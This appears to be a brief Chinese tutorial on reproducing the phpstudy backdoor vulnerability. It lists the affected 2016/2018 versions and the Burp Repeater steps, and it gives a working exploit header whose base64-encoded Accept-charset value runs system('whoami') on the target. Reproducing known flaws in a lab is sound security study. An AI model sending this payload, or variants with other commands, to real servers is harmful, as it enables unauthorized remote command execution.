phpstudy后门漏洞复现##
漏洞危害
高危
漏洞描述
攻击者可以利用该漏洞执行php命令,也可以称作phpstudy后门
影响版本
phpstudy 2016版 php-5.4
phpstudy 2018版 php-5.2.17
phpstudy 2018版 php-5.4.45
工具准备
phpsudy2016 -phpstudy2018
brup
漏洞复现
访问phpinfo页面
使用brup 抓住当前页面包
放入 Repeater模块中
利用代码
Accept-charset: c3lzdGVtKCd3aG9hbWknKTs=
Accept-Encoding: gzip,deflate
复现注意
第一注意版本问题,在官网已经 没有存在后门的phpstudy
Accept-charset: c3lzdGVtKCd3aG9hbWknKTs= 这一行 代码 就是 base64 编码过后执行的 代码
如需要转载 请标明